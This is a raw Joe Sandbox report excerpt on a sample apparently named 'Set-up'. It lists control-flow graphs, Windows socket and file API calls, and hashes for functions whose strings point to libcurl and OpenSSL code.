                                    control_flow_graph 1672 c876a0-c876be 1673 c876c0-c876c7 1672->1673 1674 c876e6-c876f2 send 1672->1674 1673->1674 1675 c876c9-c876d1 1673->1675 1676 c8775e-c87762 1674->1676 1677 c876f4-c87709 call c872a0 1674->1677 1678 c8770b-c87759 call c872a0 __acrt_iob_func call c8cb20 fflush _errno 1675->1678 1679 c876d3-c876e4 send 1675->1679 1677->1676 1678->1676 1679->1677
                                    APIs
                                    • send.WS2_32(multi.c,?,?,?), ref: 00C876DE
                                    • send.WS2_32(multi.c,?,?,?), ref: 00C876EA
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 00C87721
                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00C87745
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00C8774D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: send$__acrt_iob_func_errnofflush
                                    • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                                    • API String ID: 3540913164-3388739168
                                    • Opcode ID: c2ce028632caca88b0e0becb05ab1e81d5be48db885c67a642766dc4cfd1fd50
                                    • Instruction ID: b53892641f22b4d22ddfb0b3aa04cd29f9dc3f924d57411583aecbe57921d05c
                                    • Opcode Fuzzy Hash: c2ce028632caca88b0e0becb05ab1e81d5be48db885c67a642766dc4cfd1fd50
                                    • Instruction Fuzzy Hash: 5511C8F59083546BD130BB5AAC49E27BBACDB81B2CF15061CF91893245FB61ED00CBB5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1686 e047b0-e047bf call e5e5d0 1688 e047c4-e047dd strchr 1686->1688 1689 e04824-e0485e call e37120 call e37220 GetLastError call e37310 _errno 1688->1689 1690 e047df-e047f2 call dfd520 1688->1690 1707 e04860-e04869 _errno 1689->1707 1708 e0486b-e0488b call e37120 call e37220 1689->1708 1696 e047f8-e0481f call dfd690 call dfdf50 1690->1696 1697 e0488d-e04896 fclose 1690->1697 1703 e048c4-e048cb 1696->1703 1698 e048c2 1697->1698 1698->1703 1707->1708 1709 e04898-e048b3 call e37120 call e37220 1707->1709 1717 e048b8-e048bf call e37310 1708->1717 1709->1717 1717->1698
                                    APIs
                                      • Part of subcall function 00E5E5D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00E047C4,?,00000000,00000000,00000000,?,00000000,?,00DEA31E,?,012561B4), ref: 00E5E5E2
                                      • Part of subcall function 00E5E5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,00000001,00000000,00000000,?,00000000,00E047C4,?,00000000,00000000,00000000,?,00000000,?), ref: 00E5E5FA
                                      • Part of subcall function 00E5E5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001), ref: 00E5E637
                                      • Part of subcall function 00E5E5D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00DEA31E), ref: 00E5E64D
                                      • Part of subcall function 00E5E5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00DEA31E,00000001,?,00000008,?,?,00000000,00E047C4,?,00000000,00000000,00000000,?,00000000), ref: 00E5E665
                                      • Part of subcall function 00E5E5D0: _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,00E047C4,?,00000000,00000000,00000000,?,00000000,?,00DEA31E,?,012561B4), ref: 00E5E678
                                      • Part of subcall function 00E5E5D0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,00E047C4,?,00000000,00000000,00000000,?,00000000,?,00DEA31E,?,012561B4), ref: 00E5E685
                                      • Part of subcall function 00E5E5D0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,00E047C4,?,00000000,00000000,00000000,?,00000000,?,00DEA31E,?,012561B4), ref: 00E5E690
                                      • Part of subcall function 00E5E5D0: fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00DEA31E,?,?,?,?,00000000,00E047C4,?,00000000,00000000,00000000,?,00000000,?,00DEA31E), ref: 00E5E6A6
                                    • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,00000062,?,012561B4), ref: 00E047CC
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,012561B4), ref: 00E0483D
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,012561B4), ref: 00E04855
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,012561B4), ref: 00E04860
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,012561B4), ref: 00E0488E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _errno$ByteCharMultiWide$strlen$ErrorLast_wfopenfclosefopenstrchr
                                    • String ID: BIO_new_file$calling fopen(%s, %s)$crypto/bio/bss_file.c
                                    • API String ID: 3063597995-203430365
                                    • Opcode ID: 4a688babe66aeb0f6b5795abf4a424add8d50aea2f07cfa4e7aeb4e48ff579f0
                                    • Instruction ID: 2a1c62eb38b4ef5b96505c715c731732927d7ea06189b5cc8aa6de4783fe5782
                                    • Opcode Fuzzy Hash: 4a688babe66aeb0f6b5795abf4a424add8d50aea2f07cfa4e7aeb4e48ff579f0
                                    • Instruction Fuzzy Hash: 562128E5F84304BBE2B032623C47F2B399DCB51B5CF085824FE49741C2E561995482B3

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1721 c87770-c8778e 1722 c87790-c87797 1721->1722 1723 c877b6-c877c2 recv 1721->1723 1722->1723 1726 c87799-c877a1 1722->1726 1724 c8782e-c87832 1723->1724 1725 c877c4-c877d9 call c872a0 1723->1725 1725->1724 1727 c877db-c87829 call c872a0 __acrt_iob_func call c8cb20 fflush _errno 1726->1727 1728 c877a3-c877b4 recv 1726->1728 1727->1724 1728->1725
                                    APIs
                                    • recv.WS2_32(?,?,00CB94BF,?), ref: 00C877AE
                                    • recv.WS2_32(?,?,00CB94BF,?), ref: 00C877BA
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000000,00000630,cf-socket.c), ref: 00C877F1
                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00C87815
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00C8781D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: recv$__acrt_iob_func_errnofflush
                                    • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                    • API String ID: 2542159810-640788491
                                    • Opcode ID: ae58e7d0bc6387cdefead802c489fabf5b376e116003e16c28bc65c84118233a
                                    • Instruction ID: 914dca990a59cb2f4632ac42bbd1ba5e40c8feb1e267fabc427858448fed6c1c
                                    • Opcode Fuzzy Hash: ae58e7d0bc6387cdefead802c489fabf5b376e116003e16c28bc65c84118233a
                                    • Instruction Fuzzy Hash: 9311E6B8908354BBD130AB65AC4DE277B6CEB85B2DF15061CF91853286EB61EC00C7B5
                                    APIs
                                    • socket.WS2_32(?,?,?), ref: 00C87618
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 00C87659
                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00C8767D
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00C87685
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: __acrt_iob_func_errnofflushsocket
                                    • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                    • API String ID: 166263346-842387772
                                    • Opcode ID: 165e2da8b356fb461cf166734acee2c17690c607de1c43319c4560fc325dd199
                                    • Instruction ID: 9f26c2a2cd5b9e35d59a3a33fdf37b92b6b367ed5d0ffe46f6b9f57441d7386f
                                    • Opcode Fuzzy Hash: 165e2da8b356fb461cf166734acee2c17690c607de1c43319c4560fc325dd199
                                    • Instruction Fuzzy Hash: 1D1159B5A002116BD630BA6EAC0AF4B7F9CDF80739F180618F924D22D2F721DC50D7A1
                                    APIs
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0100D1E8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _errno
                                    • String ID: @$Inf$NaN
                                    • API String ID: 2918714741-141429178
                                    • Opcode ID: 5b81ffe446983ebee5c99d1d0c7399927a403a77fe796a59009cd654fd1c4447
                                    • Instruction ID: 5a0013083c4250155186ea6569dfe10a7b259f54a22159b0cb5f356b42475450
                                    • Opcode Fuzzy Hash: 5b81ffe446983ebee5c99d1d0c7399927a403a77fe796a59009cd654fd1c4447
                                    • Instruction Fuzzy Hash: 0DF1C07060C3858BE7629FA8C4907AFBBE2BB85314F048A6DD9DD873C1D7359905CB92
                                    APIs
                                      • Part of subcall function 00C876A0: send.WS2_32(multi.c,?,?,?), ref: 00C876DE
                                    • WSAGetLastError.WS2_32 ref: 00CB93C3
                                      • Part of subcall function 00C9D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,00C901B1), ref: 00C9D8E2
                                    • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 00CB935C
                                    • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 00CB9388
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: CounterErrorIoctlLastPerformanceQuerysendsetsockopt
                                    • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                    • API String ID: 1798382672-2691795271
                                    • Opcode ID: 3531a521d33a96ced184edd2ab430b5fc0e64c505f9363caaa5dfb7cfeccb06e
                                    • Instruction ID: 9dc21971b6a69b7c65141991fa8a5a12e0721a570416d798800742571000e2d8
                                    • Opcode Fuzzy Hash: 3531a521d33a96ced184edd2ab430b5fc0e64c505f9363caaa5dfb7cfeccb06e
                                    • Instruction Fuzzy Hash: 5151E275604305AFE710DF24C885FAAB7A5FF84314F14862DFE589B292E730EA91CB91
                                    APIs
                                    • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,012202CD,00000000,00000000,?,?,?,00D49882,?,00000000), ref: 00D477DD
                                    • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000002,?,00000000), ref: 00D477F0
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,00000000), ref: 00D47802
                                    • GetLastError.KERNEL32(?,00000000), ref: 00D4780E
                                    • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,00000000), ref: 00D47830
                                    • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 00D47843
                                    • fread.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00D4786B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: fseek$ErrorLastfclosefopenfreadftell
                                    • String ID:
                                    • API String ID: 1915723720-0
                                    • Opcode ID: a20ede2f934da46978a5ad3af978e46e0c667962b96dad8965d0315255f147e0
                                    • Instruction ID: 9e87ea1cfabb9d7b2170b5831fee8c46fbe764aadef281704cdfd265a7dbd3d2
                                    • Opcode Fuzzy Hash: a20ede2f934da46978a5ad3af978e46e0c667962b96dad8965d0315255f147e0
                                    • Instruction Fuzzy Hash: 1B117FF1E0970567FA2229215C4AFAB355CEF91364F194439ED85D6281FA76D804C1B2
                                    APIs
                                    • getsockname.WS2_32(?,?,00000080), ref: 00CBA1C6
                                    • WSAGetLastError.WS2_32 ref: 00CBA1D0
                                      • Part of subcall function 00C9D090: GetLastError.KERNEL32 ref: 00C9D0A1
                                      • Part of subcall function 00C9D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00C9D0A9
                                      • Part of subcall function 00C9D090: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00C9D0CD
                                      • Part of subcall function 00C9D090: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00C9D0D7
                                      • Part of subcall function 00C9D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000A), ref: 00C9D381
                                      • Part of subcall function 00C9D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000D), ref: 00C9D3A2
                                      • Part of subcall function 00C9D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00C9D3BF
                                      • Part of subcall function 00C9D090: GetLastError.KERNEL32 ref: 00C9D3C9
                                      • Part of subcall function 00C9D090: SetLastError.KERNEL32(00000000), ref: 00C9D3D4
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00CBA21C
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00CBA220
                                    Strings
                                    • getsockname() failed with errno %d: %s, xrefs: 00CBA1F0
                                    • ssloc inet_ntop() failed with errno %d: %s, xrefs: 00CBA23B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: ErrorLast_errno$strrchr$__sys_errlist__sys_nerrgetsockname
                                    • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                    • API String ID: 2076026050-2605427207
                                    • Opcode ID: 83795a4789c9fd788d0945c8b52b4f9a4f784466587d2e92c9a3f0f85345994e
                                    • Instruction ID: 58f4bfb6cb55c1938adeea5cbd3c73d74beed6824240c8809b7bfaa720413ea5
                                    • Opcode Fuzzy Hash: 83795a4789c9fd788d0945c8b52b4f9a4f784466587d2e92c9a3f0f85345994e
                                    • Instruction Fuzzy Hash: 9721E671804280ABF7269B59DC46FE677BCEF81328F040214F99853151FE32698587A3
                                    APIs
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00C83BA6,?,0134B044,00C81BD2), ref: 00C873A6
                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00C83BA6,?,0134B044,00C81BD2), ref: 00C873CA
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00C83BA6,?,0134B044,00C81BD2), ref: 00C873D2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: __acrt_iob_func_errnofflush
                                    • String ID: LIMIT %s:%d %s reached memlimit$MEM %s:%d calloc(%zu,%zu) = %p$calloc
                                    • API String ID: 4185500129-1340350808
                                    • Opcode ID: 80364f55b4e81cf1b66d0e98cf9a7d6dd5ad9156cc3665f75c942d414759f299
                                    • Instruction ID: 24c91f6eaa0f95b08ebc73bf3a4a51903f75871d42202699f9d55b5168e5c9b0
